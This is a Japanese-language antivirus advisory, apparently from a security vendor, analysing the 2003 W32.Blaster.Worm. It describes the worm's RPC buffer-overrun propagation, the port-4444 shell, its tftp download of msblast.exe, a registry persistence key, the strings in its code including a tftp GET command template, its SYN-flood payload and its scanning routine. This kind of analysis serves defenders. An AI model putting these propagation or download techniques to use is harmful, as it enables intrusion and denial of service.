発見日: August 11, 2003
更新日: September 27, 2007 1:02:52 AM
影響を受けるシステム: Windows

W32.Blaster.Worm は、Microsoft Windows DCOM RPC インターフェースのバッファオーバーランの脆弱性(BID 8205)を悪用することによって伝搬するワームです。 これは、windowsupdate.com に対してサービス拒否攻撃を開始する、日付によってトリガーされるペイロードを持っています。

W32.Blaster.Worm は DCE デーモンでサービス拒否攻撃を起こすと、複数のベンダーが報告しています。この問題は BID 8371 に記述されています。

ウイルス対策日

  • Rapid Release 初回バージョン August 11, 2003
  • Rapid Release 最新バージョン November 09, 2019 リビジョン 006
  • Daily Certified 初回バージョン August 11, 2003
  • Daily Certified 最新バージョン November 04, 2019 リビジョン 065
  • Weekly Certified 初回リリース日 August 11, 2003

Click here for a more detailed description of Rapid Release and Daily Certified virus definitions.


テクニカルノート

W32.Blaster.Worm は、Microsoft Windows DCOM RPC インターフェースのバッファオーバーランの脆弱性(BID 8205)を悪用することによって伝搬するワームです。

このワームは、TCP ポート 135 に接続し、バッファをオーバーランさせるほどの大量のデータを送信します。この結果、重要なメモリーが上書きされて、リモートシステムが TCP ポート 4444 でローカルシステム権限で shell を得られるようになります。その後この shell は、このワームのメイン実行ファイル 'msblast.exe' をシステムに侵入したホストから転送するために、'tftp.exe' を起動するのに使われます。 これにより、IP アドレスのハードコード化されたリストをシャットダウンすることより、このワームの伝搬を止めることの方がより難しくなります。

またこのワームは、次のレジストリエントリを作成して、Windows が起動されるたびにこれが起動されるようにします。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows auto update = msblast.exe

このワームは、'msblast.exe' をすぐに起動させるために、システムをリブートさせます。 これは 'BILLY' という名前の 1 つのミューテックスを作成して、このシステム上でこのワームのインスタンスが一度に 1 つのみ実行されるようにします。その後侵入されたホストは、UDP ポート 69 で、新たに侵入されたシステムからの tftp 接続を待機します。

次の文字列がこのワームのコード内で見られます。
msblast.exe
I just want to say LOVE YOU SAN!!
billy gates why do you make this possible ? Stop making money and fix your software!!
windowsupdate.com
start %s
tftp -i %s GET %s
%d.%d.%d.%d
%i.%i.%i.%i
BILLY
windows auto update
SOFTWARE\Microsoft\Windows\CurrentVersion\Run

システムの日付が 8 月 15 日より後で 12 月 31 日より前である場合は、このワームは、標的のシステムに windowsupdate.com に対するサービス拒否攻撃を開始させます。またこの攻撃は、上記の日付の範囲外の各月の 15 日より後でも起こります。サービス拒否攻撃が起こるには、次の条件のうちのいずれかに該当する必要があります。
このワームが、ペイロード期間内に感染されたかまたはリブートされたかのいずれかである Windows XP コンピュータ上で実行された場合。

このワームが、ペイロード期間中に感染しかつ感染してから再起動されていない Windows 2000 コンピュータ上で実行された場合。

このワームが、ペイロード期間中に感染してから再起動されており、かつ現在ログインしているユーザーが管理者である Windows 2000 コンピュータ上で実行された場合。

このサービス拒否攻撃のトラフィックは、次の特徴を持っています。
宛先ポート 80 の SYN フラッド
50 HTTP パケット/秒
パケットは 40 バイト長
これが windowsupdate.com の DNS エントリを特定できない場合は、宛先アドレス 255.255.255.255 を使います。Microsoft 社は windowsupdate.com の DNS レコードを削除済みであることを留意しておくことが重要です。

またこれらのパケットは次の特徴も持っています。
IP identification = 256
Time to Live = 128
Source IP address = a.b.x.y(a.b はホスト ip から、x.y はランダム。a.b もランダムである場合もあります。)
Destination IP address = "windowsupdate.com" の dns レゾリューション
TCP Source port は 1000 から 1999
TCP Destination port = 80
TCP Sequence number 下位バイト 2 つは常に 0 に設定されている。上位バイト 2 つはランダム。
TCP Window size = 16384

このワームのコードは、サービスパックのレベルに関わりなく Windows 2000 と Windows XP を悪用するための修正オフセットを含んでいるようです。 このワームでは、標的に対して Windows 2000 オフセットを使う確率は 20%、Windows XP オフセットを使う確率は 80% です。

スキャンルーチンを行うために、このワームはランダムな IP アドレス A.B.C.0 を計算します。ここで A、B、C は 0 から 254 の間のランダムな値です。40% の確率で、C が 20 よりも大きい場合は C から 20 未満のランダムな値を差し引きます。いったんランダムなアドレスが計算されると、このワームは A.B.C.0 からスキャンを始め、サブセット全体をスキャンするために最期のオクテットを増分してゆきます。

** 2003 年 8 月 13 日 - このワームの新しい亜種が報告されました。この亜種は 'penis32.exe' という名前のファイルを使います。この亜種の分析は現在進行中であり、詳細が分かり次第新しい情報を提供します。

** 2003 年 8 月 13 日 - このワームの 3 つ目と思われるバージョンが世間に出回っている可能性があります。この亜種は、機能においてはオリジナルのバージョンと同一ですが、ファイル名 'teekids.exe' を使うと報告されています。この実行可能ファイルは、現在のアンチウイルス定義による検出を避けるために、いくつかの文字列を変更しておりリパックされていると報告されています。

** 2003 年 8 月 27 日 - HP は、W32.Blaster.Worm は HP OpenView DCE デーモンでサービス拒否攻撃を起こすと報告しました。その他の DCE の実装は、このサービス拒否攻撃に対して脆弱であるようです。

W32.Blaster.Worm は DCE デーモンでサービス拒否攻撃を起こすと、複数のベンダーが報告しています。この問題は BID 8371 に記述されています。